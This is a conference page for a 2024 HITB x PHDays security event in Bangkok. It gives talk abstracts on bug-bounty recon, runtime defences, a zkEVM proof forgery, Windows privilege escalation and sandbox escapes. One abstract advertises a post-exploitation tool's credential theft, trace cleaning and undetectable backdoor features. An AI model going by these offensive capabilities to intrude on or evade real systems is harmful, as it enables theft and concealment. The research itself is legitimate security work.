A deep-knowledge security conference and gathering

// HITB x PHDays

Saturday, May 25th – Level M, Residence, Grand Hyatt Erawan Bangkok

  • 00Days
  • 00Hours
  • 00Minutes
  • 00Seconds

Join us in Bangkok for a security get-together featuring some of the regions hottest network security researchers!
– Held in collaboration with Postive Hack Days Festival in Moscow – 



PHDays is the oldest and biggest cybersec event in Russia that’s been held annually since 2011. It brings together renowned international cybersecurity and IT experts to discuss offensive and defensive security, application security, Devsecops, AI, and more.

For the second year in a row PHDays offers cybersecurity awareness content for general public, in 2023 a total of 140 000 spectators visited PHDays Fest in the famous Gorky Park in Moscow. This year the PHDays main event will be held at the Luzhniki stadium that hosted the FIFA World Cup Final in 2018.





Talk 003 – Critical Proof Forgery Attack on zkEVM
Uyen Nguyen & Thanh Nguyen (@redragonvn)




Talk 006 – Escaping Sandboxes on Windows
Dr. Zhiniang Peng (@edwardzpeng)


Talk 007 – A Bug Hunter’s Reflections on Fuzzing
Alexander Popov (@a13xp0p0v)

19:00 – 21:00




Talk 001 - Attacking Organizations with Big Scopes: From Zero to Hero

Hussein Daher

This presentation offers a comprehensive exploration of reconnaissance strategies tailored specifically for bug bounty hunters, illuminating pathways to uncover vulnerabilities and reap substantial rewards.

Delving into the realm of bug bounty programs, participants will discover the crucial role of reconnaissance in maximizing success. From understanding program scope to identifying potential attack surfaces, attendees will learn how to lay the groundwork for fruitful bug hunting endeavors.

Drawing upon the latest methodologies and best practices, the presentation navigates participants through the intricacies of reconnaissance in bug bounty contexts. Whether it’s mapping out web applications, dissecting network architectures, or profiling key personnel, attendees will gain actionable insights into gathering the intelligence needed to uncover elusive vulnerabilities.

Moreover, the presentation addresses the nuances of bug bounty hunting within expansive organizational scopes, offering strategic guidance on prioritizing targets and optimizing reconnaissance efforts. Attendees will learn to leverage automation tools and open-source intelligence (OSINT) platforms effectively, empowering them to navigate the complex digital ecosystems of large-scale organizations with precision and efficiency.

Through real-world examples and case studies, the presentation illustrates the tangible benefits of a strategic reconnaissance approach in bug bounty hunting. Participants will gain practical knowledge and actionable tips to enhance their bug hunting endeavors, ultimately positioning themselves as formidable adversaries in the pursuit of securing large-scale organizations against cyber threats.

Attendees will be guided through the utilization of specialized tools such as FFuf, Linkfinder and others to gather actionable intelligence and target elusive vulnerabilities effectively. Through real-world examples and strategic guidance, participants will gain practical knowledge and actionable insights to enhance their bug hunting endeavors, positioning themselves as formidable adversaries in the pursuit of securing large-scale organizations against cyber threats.

Talk 002 - SW-RASP - Java Self-Protection Defense

Ming Hu

SW-RASP is a Java application runtime self-protection defense technology capable of intercepting unknown network attacks at runtime.

Leveraging low-level technology based on JVMTI, SW-RASP hooks into the underlying logic of the JDK (Java Development Kit) at runtime, enabling it to intercept command injection attacks, arbitrary file uploads, Webshell connections, and other malicious activities.

Furthermore, SW-RASP utilizes Asm syntax tree analysis to identify malicious operations, achieving a 99% interception rate. SW-RASP offers superior protection compared to traditional WAF solutions because it operates at the application’s underlying logic rather than at the traffic layer. SW-RASP does not need to detect traffic, because SW-RASP’s interception principle is from the call stack credibility detection, and based on SQL semantics and command parsing semantics detection.

Talk 003 - Critical Proof Forgery Attack on zkEVM

Uyen Nguyen & Thanh Nguyen

This presentation unveils the discovery and resolution of a critical vulnerability in Polygon zkEVM. zkEVM is a layer-2 solution designed to enhance Ethereum’s scalability through off-chain transaction processing and the use of Zero-Knowledge Proofs (ZKP).

Verichains cryptography research team (Duy Hieu Nguyen, Uyen Nguyen, Giap Nguyen) found a critical security loophole in the zkProver component, allowing proof forgery attacks that posed a critical threat to the integrity and security of all funds across Layer 1 and Layer 2 of the blockchain. The attack works under all circumstances, and, given a forged proof, no one can tell how it is forged since the mechanism is completely hidden by the zero-knowledgeness of the argument systems.

The presentation will delve into the specifics of mathematical vulnerabilities, the method of exploiting it through a proof forgery attack, and its broad implications for the blockchain’s integrity and security. Furthermore, the talk will emphasize the need for collaboration between security researchers and blockchain developers to ensure continuous security evaluations and the adoption of proactive measures to enhance the resilience of blockchain ecosystems.

Talk 004 - XPost: A Post Exploitation Tool for High Value Systems

Linhong Cao

XPost is a post-exploitation tool tailored for high-value systems (currently supports Zimbra, Confluence, Zoho) that is designed to assist in real-world attack penetration testing and an initial version of the tool will be made available after this talk.

# What can it do?

Including but not limited to:email retrieval, plaintext password recording, operations data acquisition, obtaining arbitrary login credentials under unknown passwords, domain controller information retrieval, single sign-on hijacking, and trace cleaning operations.

# Advantages

The data callback traffic achieves traffic concealment stealth persistence, fileless landing after server rebooting or patch updates and the backdoor remains undetectable.

Talk 005 - A Privilege Escalation Exploit in Windows That Microsoft Won't Fix


Based on the 6 year old Potato privilege escalation, I discovered a new attack by researching DCOM.

Similar to the Potato attacks of the past (which currently do not run on the latest version of Windows), this new privilege escalation attack requires access to web / database as a non-privilege user and allows for escalation to “NT AUTHORITY\SYSTEM” in Windows 2012 – Windows 2022. The method was discovered while I was researching DCOM relating to some defects in RPCSS when dealing with oxid. I named it GodPotato.

Talk 006 - Escaping Sandboxes on Windows

Dr. Zhiniang Peng

Modern desktop applications have become increasingly secure due to various mitigations, but Chrome and Adobe PDF reader are still the popular targets for top attackers.

Of course, sandbox escape is the primary challenge here and in this talk, we will discuss our journey of research on sandbox escape including the sandbox internals on Microsoft Windows and our sandbox escape methodology. We will also do a review on the attack surface of different sandboxes on Windows and we will of course show our exploits for escaping the Chrome and Adobe sandbox on Windows.

Talk 007 - A Bug Hunter's Reflections on Fuzzing

Alexander Popov

Fuzzing is an incredibly effective and popular technique for testing software. But not all the bugs that it finds are interesting for bug hunters. Fuzzing for vulnerability discovery is special, and in this talk, Alexander will share his reflections on that topic inspired by his experience in Linux kernel fuzzing.

Attendees can expect a detailed analysis of the fuzzing process, the cases from Alexander’s vulnerability research practice, and insights on how to make fuzzing effective for bug hunting.

Talk 008 - Javascript Engine Vulnerability Research - State of the Art

Alisa Esage

In my talk on “JavaScript Engines Vulnerability Research: State of the Art” – a series continuation of my previous talk: “Hypervisor Vulnerability Research: State of the Art” (2018) – the presentation will unfold in two detailed sections to offer attendees a comprehensive understanding of the subject. Initially, the talk will introduce core abstract models and technology maps, pivotal for navigating the complex vulnerability landscape of JavaScript engines. This foundation will equip attendees with the theoretical knowledge necessary to identify and understand potential security flaws.

Following this, the session will transition into a meticulous examination of recent browser JavaScript bugs, offering a practical perspective. Audience members can anticipate gaining insights into the mechanisms behind these vulnerabilities, illustrated with real-world examples, and learn about the latest research methodologies employed in discovering and mitigating such issues.

This talk promises a blend of theoretical concepts and hands-on examples, making it a valuable learning experience for developers, security researchers, and anyone interested in the security aspects of JavaScript engines.


© 2024 All Rights Reserved. - Hack In The Box Pte. Ltd.